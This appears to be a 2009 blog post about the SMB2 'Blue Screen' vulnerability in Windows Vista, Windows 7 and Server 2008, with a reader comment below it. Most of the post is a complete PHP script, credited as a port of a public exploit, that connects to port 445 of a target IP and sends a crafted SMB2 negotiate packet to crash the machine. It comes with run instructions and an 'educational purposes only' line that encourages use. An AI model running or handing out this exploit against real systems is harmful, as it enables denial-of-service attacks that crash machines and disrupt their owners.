Blue Screen of Shame

Once more Microsoft has done something great.

smb2 exploit that some may know as Blue Screen Vista Exploit has not yet been patched and not will be soon.

No Emergency Patch For Latest Windows Exploit

The solution for smb2 patch as Microsoft has published is to turn off your file sharing or turn on your firewall.

so you may use this exploit, of course for educational purposes only, and maybe to inform Microsoft of how annoying this exploit could be.

So I’ve managed to find/make a php code to do so and using it on my Mac with the php command. This code could run on iPhone with some modifications.

you may save this file (e.g bsod.php) and run it like this:

php  ./bsod.php [IP]

so the file would be as following:


<?
/*
* Lame Windows Vista / Windows 7 / Win2k8 R1 SP2+updates and beta R2 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote BSOD
* Author: Ricardo Almeida
* email:  ricardojba[at]aeiou[DoT]pt
*
* Credits: http://seclists.org/fulldisclosure/2009/Sep/0039.html (exploit ported to PHP)
*
*/
if ($argc != 2) {die("Usage: lame-smb-bsod.php \n");}
$host = $argv[1];
$payload = "\x00\x00\x00\x90".
"\xff\x53\x4d\x42".
"\x72\x00\x00\x00".
"\x00\x18\x53\xc8".
"\x00\x26".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe".
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54".
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31".
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00".
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57".
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61".
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c".
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c".
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e".
"\x30\x30\x32\x00";
$mysock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
$result = socket_connect($mysock, $host, 445);
if ($result === false) echo "Connect failed.\nReason: ($result) " . socket_strerror(socket_last_error($mysock)) . "\n";
else echo "\nConnected to $host\n";
echo "Bye, Bye WindowzÉ\n";
socket_write($mysock, $payload, strlen($payload));
socket_close($mysock);
?>

Full Detailed article about Windows Smb2 Exploit: SMB2 Exploitation Guide for Housekeepers & Dummies !

If you want this exploit in other Programming Languages: http://lmgtfy.com/?q=smb2+exploit+code

October 4th, 2009 | Tags: , , , , , , , | 1 Comment »

One Response to “Blue Screen of Shame”

  1. service error 1053 fix says:
    February 11, 2010 at 9:40 pm

    Thanks for spending the time to make clear the terminlogy to the beginners!

    Reply

Leave a Reply